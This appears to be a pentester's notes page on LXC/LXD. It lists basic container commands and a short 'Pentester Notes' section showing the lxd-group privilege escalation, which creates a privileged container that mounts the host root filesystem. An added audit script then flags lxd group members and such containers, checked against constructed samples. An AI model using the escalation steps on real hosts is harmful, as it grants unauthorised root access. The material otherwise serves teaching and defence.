Linux Containers (LXC)

linuxsystemhardening linuxfundamentals linuxprivilegeescalation

Linux Containers (LXC) is a Linux-only virtualization method for running multiple isolated Linux systems on one host, all sharing the host's Linux kernel.

Docker is built over LXC. It provides additional features and a simplified interface. They share the notion of 'image' and 'container'.

LXC can only be used on Linux hosts. Members of the lxd group can run any lxc command without sudo.

Random commands:

$ lxd init
$ lxc launch ubuntu:22.04 container_name
$ lxc image import image.tar.gz --alias image_name
$ lxc init image_name container_name
$ lxc start container_name
$ lxc exec container_name /bin/bash

Pentester Notes ☠️

Create a privileged container that mounts the host's underlying file system.

$ lxc init image_name container_name -c security.privileged=true
$ lxc config device add container_name device_name disk source=/ path=/mnt/hostfs recursive=true
$ cd /mnt/hostfs/ # inside the container
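From the defender's side, the two things worth auditing on an LXD host are who sits in the lxd group (membership is root-equivalent, since any member can build the container above) and whether any existing container already combines security.privileged=true with a disk device whose source is the host root. The script below is an added example written for these notes, not part of the original page or of the LXD project; it works on text you hand it (a getent-style group line and the output of `lxc config show <name> --expanded`), so it runs offline against the constructed samples embedded here and can be fed real output on a host.

```shell
#!/bin/sh
# Added audit helper for LXD hosts (not from the original notes).
# Checks two things a defender cares about:
#   1. accounts in the lxd group (root-equivalent on the host), and
#   2. containers whose expanded config sets security.privileged=true AND
#      attaches a disk device with source: / (the host-fs mount pattern).
# Inputs are plain text so the functions can be run on captured output:
#   getent group lxd
#   lxc config show <container> --expanded

# Print the members of the lxd group, space separated, from a getent-style line.
lxd_group_members() {
    printf '%s\n' "$1" | awk -F: '$1 == "lxd" { gsub(",", " ", $4); print $4 }'
}

# Return 0 if the expanded config text describes a privileged container that
# mounts the host root file system as a disk device, 1 otherwise.
config_is_host_escape() {
    cfg="$1"
    # Privileged flag: `security.privileged: "true"` (quotes optional).
    printf '%s\n' "$cfg" \
        | grep -Eq '^[[:space:]]*security\.privileged:[[:space:]]*"?true"?[[:space:]]*$' \
        || return 1
    # Walk the devices block: a device name line is 2-space indented and ends
    # with ':'; its keys are 4-space indented. Flag a device whose source is
    # '/' and whose type is disk. Note: `path: /` is the normal root disk and
    # must NOT trigger; only `source: /` points at the host root.
    printf '%s\n' "$cfg" | awk '
        /^  [^ ].*:$/ { if (src && disk) found = 1; src = 0; disk = 0 }
        /^    source:[[:space:]]*\/[[:space:]]*$/ { src = 1 }
        /^    type:[[:space:]]*disk[[:space:]]*$/ { disk = 1 }
        END { if (src && disk) found = 1; exit (found ? 0 : 1) }
    '
}

# Print one finding per line; exit 1 if anything was found (cron friendly).
# Usage: audit_host "<group line>" "<config 1>" "<config 2>" ...
audit_host() {
    group_line="$1"; shift
    findings=0
    members=$(lxd_group_members "$group_line")
    if [ -n "$members" ]; then
        echo "lxd group members (root-equivalent on host): $members"
        findings=$((findings + 1))
    fi
    for cfg in "$@"; do
        if config_is_host_escape "$cfg"; then
            name=$(printf '%s\n' "$cfg" | awk '/^name:/ { print $2 }')
            echo "privileged container with host root mounted: $name"
            findings=$((findings + 1))
        fi
    done
    [ "$findings" -eq 0 ]
}

# --- constructed sample data (not captured from a real host) ---------------
SAMPLE_GROUP='lxd:x:130:alice,bob'

# A container built exactly as in the notes above: privileged + source: /.
SAMPLE_ESCAPE_CFG='name: pwn
config:
  security.privileged: "true"
devices:
  hostfs:
    path: /mnt/hostfs
    recursive: "true"
    source: /
    type: disk
  root:
    path: /
    pool: default
    type: disk'

# A normal unprivileged container: only the pool-backed root disk (path: /).
SAMPLE_SAFE_CFG='name: web
config:
  security.privileged: "false"
devices:
  root:
    path: /
    pool: default
    type: disk'

# Stand-alone run over the samples; prints two findings and exits 1.
audit_host "$SAMPLE_GROUP" "$SAMPLE_ESCAPE_CFG" "$SAMPLE_SAFE_CFG"
```

On a real host, feed it `$(getent group lxd)` and the expanded config of each container from `lxc list -c n --format csv`; an empty lxd group and zero flagged containers is the state to keep, and `security.privileged` should stay at its default of false unless a container has a documented need for it.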

👻 To-do 👻

Stuff that I found but have never read/used yet.

$ lxc image list
$ sudo apt-get install lxc lxc-utils -y
$ sudo lxc-create -n xxx -t yyy
$ lxc-ls
$ lxc-start/stop/restart -n xxx
$ lxc-config -n xxx -s storage/network/security
$ lxc-attach -n xxx [-f /path/to/share]